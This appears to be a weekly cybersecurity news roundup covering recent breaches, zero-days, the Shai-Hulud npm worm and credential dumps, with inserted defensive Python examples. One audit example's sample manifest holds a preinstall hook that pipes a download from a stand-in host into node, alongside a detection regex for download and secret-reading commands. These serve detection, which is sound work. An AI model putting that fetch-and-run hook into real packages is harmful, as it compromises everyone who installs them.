The past week was marked by an unusual accumulation of confirmed security incidents, complex data breaches and several zero-day attacks on global corporations and critical infrastructure alike. The recurring link between compromised third-party providers, vulnerabilities in software supply chains and insufficiently isolated analytics services is striking. The overall picture is one of professional groups that exploit zero-days in widely deployed ERP systems while at the same time drawing on large credential leaks to automate and scale their attacks. The week's analysis thus reveals a closely linked web of technical vulnerabilities, missing segmentation in service-provider chains and the growing importance of aggregated mass data in the underground. I will certainly continue this new format (further explanation in the footer) periodically if the response is positive, because that's what Sundays are for…
Confirmed data breaches
OpenAI has confirmed that user data was exfiltrated through the embedded analytics service Mixpanel. Affected are API customers whose names, email addresses and coarse location data were exposed. Financial information and passwords were not affected, but the incident is still sensitive because this is exactly the data attackers need for credible, targeted spear phishing against API customers. The case shows that wiring an analytics service into production systems without strictly separated data flows creates considerable risk: every field handed to the provider becomes part of the provider's breach surface, whether or not it was needed for the analytics.
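The boundary that the Mixpanel case argues for can be expressed in a few lines. The following is an added example, not OpenAI's or Mixpanel's code: an explicit property allowlist applied before an event leaves the production system, a keyed pseudonymous ID in place of the internal user ID, and location coarsened to country. The field names, the allowlist, the key and the sample event are all assumptions constructed for the example; `distinct_id` is only used because it is the Mixpanel-style name for the per-user identifier.

```python
import hashlib
import hmac
import json

# Assumption: only these properties may ever leave for the analytics vendor.
ANALYTICS_ALLOWLIST = frozenset({"event", "plan", "api_version", "country", "ts"})

# Assumption: this key lives only in the production environment and is never
# configured into the analytics SDK, so the vendor (or whoever breaches it)
# cannot map the IDs it holds back to real users.
PSEUDONYM_KEY = b"example-key-rotate-me"

# Fields that must never appear in an outbound analytics event.
PII_FIELDS = frozenset({"email", "name", "ip", "city", "region", "lat", "lon", "user_id", "geo"})


def pseudonymous_id(internal_user_id: str, key: bytes = PSEUDONYM_KEY) -> str:
    """Stable, keyed, non-reversible analytics ID for one internal user."""
    digest = hmac.new(key, internal_user_id.encode("utf-8"), hashlib.sha256)
    return digest.hexdigest()[:32]


def sanitize_event(raw: dict) -> dict:
    """Build the event the vendor receives from a raw, PII-laden internal event."""
    props = raw.get("properties", {})
    # Coarsen location: keep the country only, never city/region/coordinates/IP.
    country = props.get("country") or (props.get("geo") or {}).get("country")
    out = {k: v for k, v in props.items() if k in ANALYTICS_ALLOWLIST}
    if country:
        out["country"] = country
    out["event"] = raw["event"]
    # The vendor sees the pseudonym, never the internal user ID or email.
    out["distinct_id"] = pseudonymous_id(raw["user_id"])
    return out


def leaked_fields(sanitized: dict) -> set:
    """Audit helper: which PII fields survived sanitisation (should be empty)."""
    return {k for k in PII_FIELDS if k in sanitized}


# Constructed sample event, as an API backend might emit it internally.
SAMPLE_RAW = {
    "event": "api_request",
    "user_id": "usr_0001",
    "properties": {
        "email": "alice@example.com",   # must not reach the vendor
        "name": "Alice Example",        # must not reach the vendor
        "ip": "203.0.113.7",            # must not reach the vendor
        "plan": "team",
        "api_version": "v1",
        "geo": {"country": "DE", "city": "Munich"},
        "ts": 1764000000,
    },
}

if __name__ == "__main__":
    print(json.dumps(sanitize_event(SAMPLE_RAW), indent=2))
```

The design point is that the allowlist is the only path out: a new field added to the internal event by a developer does not reach the vendor until someone deliberately adds it to `ANALYTICS_ALLOWLIST`, and `leaked_fields` can run in a unit test so that change is caught in review rather than in a breach notification.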
Coupang reports that around 33.7 million customer accounts have been compromised. The attacks are said to have taken place over several months and include names, contact information, postal addresses and parts of order histories. According to the company, payment data was not affected. At the same time, insider hypotheses are being discussed, but these have not been conclusively verified.
In the UK, fiber optic provider Brsk is investigating an incident in which more than 230,000 contract and contact records have surfaced on underground platforms. The data includes customer categorization markers, which makes social engineering attempts against those customers considerably more credible.
Asahi, a major Japanese beverage manufacturer, continues to struggle with the consequences of a ransomware attack. According to the company, more than 1.5 million customer and employee records are potentially affected, and the attackers are also said to have exfiltrated internal documents.
An extensive data leak has been confirmed at the French social security service Pajemploi, potentially affecting up to around 1.2 million users. The combination of identity data, bank details and social security numbers offers considerable potential for abuse, from account takeover to identity fraud.
The Spanish airline Iberia confirmed that an extensive customer database had been compromised. The attackers are demanding a high payment to refrain from publishing sensitive passenger profiles, which include names, e-mail addresses and frequent flyer account information. Payment data is not said to be affected. Despite the all-clear on payment data, the combination of personal contact data and status program information poses a substantial risk of targeted attacks, especially against business travelers.
Zero-day exploits
One particularly serious case concerns a zero-day vulnerability in Oracle E-Business Suite, cataloged as CVE-2025-61882. The Cl0p group used it to attack Dartmouth College and exfiltrate around 226 GB of sensitive data. Social Security numbers, bank account information and personal files of at least 1,494 identified individuals are cited, although the actual number is likely higher. Reports suggest the same vulnerability has already been abused against other institutions. Because ERP systems sit at the center of critical business processes and their updates are often delayed, the risk is disproportionately high, especially in organizations where release cycles are tightly coupled to operational processes.
At the same time, the Windows kernel vulnerability CVE-2025-62215 remains relevant and is already being actively exploited in combination with other exploits. It enables local privilege escalation and is mainly observed in post-exploitation scenarios: an attacker who already has code execution as a low-privileged user uses it to obtain kernel-level privileges. The combination of moderate complexity and broad applicability in attack chains makes it operationally significant, even though it does not allow remote code execution on its own.
Intel has addressed further vulnerabilities in server firmware, Wi-Fi drivers and GPU drivers. There is no evidence of zero-day exploitation here, but the published patch series shows the continued relevance of firmware security in heterogeneous system landscapes, where fixes have to be rolled out through many separate vendor channels.
Supply chain attacks
The activities surrounding the npm worm Shai-Hulud 2.0 continue to dominate the picture. Projects affected include Postman, Zapier, ENS Domains and PostHog. The worm self-propagates through the npm registry, uses GitHub repositories to stage what it steals, and has been identified in numerous build pipelines. The attackers backdoor affected packages to exfiltrate credentials and project secrets. Individual analyses indicate that parts of the malicious code were generated automatically, which would increase the speed of adaptation; this assumption cannot be conclusively verified.
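A worm that enters a build through a dependency has to execute somewhere, and for npm packages the usual place is an install-time lifecycle script. The following is an added example and not code from any of the projects named above: a small audit that walks the `package.json` manifests under a `node_modules` tree, lists every install-time hook and flags hook bodies that download, decode or read the environment. The hook names are the real npm lifecycle events; the heuristics, the sample manifests and the package names in them are constructed for the example.

```python
import json
import re
from pathlib import Path

# Real npm lifecycle events that run arbitrary code during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumption: a heuristic for hook bodies that fetch, decode or exfiltrate.
# A plain "node setup.js" will not match, which is why every hook is still
# reported at "info" level: the hook itself is the attack surface.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|base64|atob\(|child_process|process\.env|"
    r"github\.com|npm token|npm publish)",
    re.IGNORECASE,
)


def audit_manifest(manifest: dict) -> list:
    """Return one finding per install-time hook declared in a package manifest."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append({
            "package": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "hook": hook,
            "command": cmd,
            "severity": "high" if SUSPICIOUS.search(cmd) else "info",
        })
    return findings


def audit_node_modules(root: Path) -> list:
    """Audit every package.json below `root` (typically ./node_modules)."""
    findings = []
    for manifest_path in sorted(root.glob("**/package.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or not JSON: skip, do not crash the audit
        findings.extend(audit_manifest(manifest))
    return findings


def high_severity(findings: list) -> list:
    return [f for f in findings if f["severity"] == "high"]


# Constructed sample manifests (package names invented for the example).
SAMPLE_MANIFESTS = [
    {"name": "pad-strings", "version": "1.0.0",
     "scripts": {"test": "node test.js"}},
    {"name": "native-addon", "version": "2.1.0",
     "scripts": {"install": "node-gyp rebuild"}},
    {"name": "helpful-utils", "version": "3.4.5",
     "scripts": {"preinstall": "node setup.js && curl -s https://example.invalid/x | node"}},
]


def audit_samples() -> list:
    findings = []
    for m in SAMPLE_MANIFESTS:
        findings.extend(audit_manifest(m))
    return findings


if __name__ == "__main__":
    for f in audit_samples():
        print(f"[{f['severity']}] {f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

In a pipeline this is most useful combined with `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), so that dependencies are unpacked without executing anything, the audit runs over the unpacked tree, and only the hooks an engineer has reviewed are executed afterwards. The "info" findings matter: an npm worm that hides behind an innocuous-looking `node setup.js` is caught by the policy that no dependency runs install-time code unreviewed, not by the regex.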
Another supply chain attack affects the US service provider SitusAMC, which processes mortgage and financial data for large credit institutions. As a result, sensitive information about customers of large banks may have been indirectly compromised. According to current information, banks such as JPMorgan Chase, Citibank and Morgan Stanley were not directly infiltrated but exposed through the service provider. This incident once again demonstrates the structural vulnerability of outsourced business processes, particularly in regulated areas such as the financial sector.
Credential dumps and major leaks
Several sources report the reappearance of gigantic password databases totaling over 16 billion entries. These are largely re-aggregated compilations of older leaks, supplemented by smaller recent ones. Regardless of their origin, the sheer volume is a significant risk because password reuse is still widespread in many organizations. Particularly critical is the share of accounts from sectors such as energy supply, public administration and industry that are also believed to be included in such dumps. The exact composition cannot be independently validated from public information, but the risk of mass automated logins (credential stuffing) is immediately real.
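Credential stuffing has a recognizable shape in authentication logs: one source tries many different accounts, almost all attempts fail, and the occasional success is a reused password that actually worked. The following is an added example, not part of the original article and not tied to any particular product: a sliding-window detector over a constructed, simplified log format (`<timestamp> auth <ok|fail> user=<name> src=<ip>`), which flags source addresses that hit many distinct accounts with a high failure ratio and reports which accounts succeeded from such a source, since those are the ones to reset first. The log format, thresholds and sample lines are assumptions.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumption: a simplified auth log line format constructed for this example.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>ok|fail) user=(?P<user>\S+) src=(?P<ip>\S+)$"
)

# Assumption: tuning values; real deployments derive these from their baseline.
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_USERS = 4    # distinct accounts tried from one source address
MIN_FAIL_RATIO = 0.8      # stuffing is mostly failures; a password spray too


@dataclass
class Record:
    ts: datetime
    result: str
    user: str
    ip: str


def parse_line(line: str):
    """Parse one log line; returns None for lines that are not auth records."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Record(datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["ip"])


def detect_stuffing(lines, window=WINDOW, min_users=MIN_DISTINCT_USERS,
                    min_fail_ratio=MIN_FAIL_RATIO) -> dict:
    """Return {source_ip: alert} for sources that look like credential stuffing."""
    records = sorted((r for r in map(parse_line, lines) if r), key=lambda r: r.ts)
    per_ip = defaultdict(deque)   # per source: attempts inside the window
    alerts = {}
    for rec in records:
        q = per_ip[rec.ip]
        q.append(rec)
        while rec.ts - q[0].ts > window:   # drop attempts that fell out of the window
            q.popleft()
        users = {r.user for r in q}
        fails = sum(r.result == "fail" for r in q)
        if len(users) >= min_users and fails / len(q) >= min_fail_ratio:
            alert = alerts.setdefault(rec.ip, {
                "first_seen": q[0].ts, "last_seen": rec.ts,
                "distinct_users": 0, "attempts": 0,
                "compromised_candidates": set(),   # accounts that logged in OK
            })
            alert["last_seen"] = rec.ts
            alert["distinct_users"] = max(alert["distinct_users"], len(users))
            alert["attempts"] = max(alert["attempts"], len(q))
            alert["compromised_candidates"] |= {r.user for r in q if r.result == "ok"}
    return alerts


# Constructed sample log: one stuffing source with a single successful hit,
# one user mistyping their own password, one normal login, one junk line.
SAMPLE_LOG = """\
2025-11-30T10:00:01 auth fail user=alice src=198.51.100.9
2025-11-30T10:00:02 auth fail user=bob src=198.51.100.9
2025-11-30T10:00:05 auth fail user=alice src=203.0.113.5
2025-11-30T10:00:03 auth fail user=carol src=198.51.100.9
2025-11-30T10:00:04 auth fail user=dave src=198.51.100.9
2025-11-30T10:00:06 auth ok user=erin src=198.51.100.9
2025-11-30T10:00:07 auth fail user=frank src=198.51.100.9
2025-11-30T10:00:09 auth fail user=alice src=203.0.113.5
2025-11-30T10:00:20 auth ok user=alice src=203.0.113.5
2025-11-30T10:01:00 auth ok user=gina src=192.0.2.77
this line is not an auth record
"""

if __name__ == "__main__":
    for ip, a in detect_stuffing(SAMPLE_LOG.splitlines()).items():
        print(ip, a["distinct_users"], "accounts,", a["attempts"], "attempts,",
              "successful logins:", sorted(a["compromised_candidates"]))
```

The detector deliberately keys on distinct accounts per source rather than on failures per account, which is what classic lockout policies watch; a stuffing run touches each account only once or twice and never trips per-account lockout. A large botnet spreads the attempts over many addresses, so in practice the same logic is also run per ASN or per user-agent fingerprint, and the `compromised_candidates` set feeds a forced password reset and a session revocation rather than just a dashboard.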
Almaviva, a central IT service provider in the Italian rail sector, is affected by a very large data leak. Reports speak of around 2.3 terabytes of exfiltrated data with potentially security-relevant content. Because transportation data, employee files and contract documents are combined, the potential for misuse reaches well beyond the company itself.
Under Armour was named by the Everest Group as the victim of a massive data leak. The volume mentioned comprises several hundred gigabytes, although the information provided by the attackers varies and the actual size has not been independently confirmed. However, some of the sample files provided point to real compromised company data.
Cross analysis of the week
This week’s interim analysis shows several recurring patterns. Third-party vendors and outsourced services remain key vulnerabilities as attacks increasingly target where organizations have implemented less rigorous protections or where complex integrations lead to dependencies that are difficult to control. The case of OpenAI and Mixpanel illustrates the risks of embedded analytics services that have not been strictly separated from identity data.
The zero-day exploitation of ERP systems by Cl0p points to a strategic evolution among attackers, who focus on systems with a low update frequency in order to achieve sustained access and extensive data exfiltration. At the same time, the massive password collections show that scalable forms of attack remain a significant factor, even where modern systems are hardened. User accounts are increasingly being compromised via external leaks without the affected organization itself having been attacked.
In the supply chain environment, the situation is set to worsen because build pipelines and package registries are an attractive target and the automation of modern development processes spreads compromised dependencies very quickly. Overall, the threat picture is characterized more by external dependencies than by isolated system vulnerabilities.
Technical assessment of the risks
This week’s risks can be characterized primarily by the combination of data exposure, privilege escalation and insufficiently isolated supply chains. Major data breaches at providers such as Coupang, Iberia, Pajemploi and Asahi primarily concern the confidentiality of personal data, which in many cases is entirely sufficient to enable identity theft, social engineering and targeted attacks on business travelers, bank customers or government employees. The technical risk does not arise from an immediate system takeover, but from the long-term usability of the data in downstream attack chains.
The zero-day exploitation in Oracle E-Business Suite shows how critical vulnerabilities in ERP systems are, because these systems are deeply integrated into business processes and are rarely updated in many organizations. The escalation potential here ranges from data exfiltration and manipulation of operational processes to comprehensive persistence in critical infrastructures. The ongoing Shai-Hulud attacks illustrate the inherent fragility of package ecosystems and the supply chains built on them. Manipulated dependencies can enter production systems almost unnoticed, without any direct interaction between the developers and the attackers. The technical complexity of modern build pipelines favors this form of attack.
Finally, aggregated credential dumps with billions of entries increase the risks to authentication systems. Even strong security mechanisms fall behind if weaknesses in user behavior or identity management allow attackers to run large-scale automated attacks against them.
What is LeakWatch?
As part of this project, a specially created and trained ChatGPT-based bot is used for the Internet research; it automates the analysis of relevant data sources and at the same time produces translations and text excerpts. The aim is to rely on primary sources that are as unadulterated as possible, which is why all links are recorded in tabular form so that interested readers can optionally dig deeper. Without AI support, the automated search and extraction would only be possible with disproportionate effort, but every assessment is made editorially and everything is checked for content, because the AI cannot interpret or formulate all content completely reliably. LeakWatch is designed as a periodic security and leak analysis format created in the style of igor'sLAB and following specific specifications. The focus is on verifiable events from primary sources, technical classification and a completely neutral evaluation, free of the influence of already filtered secondary information from third parties.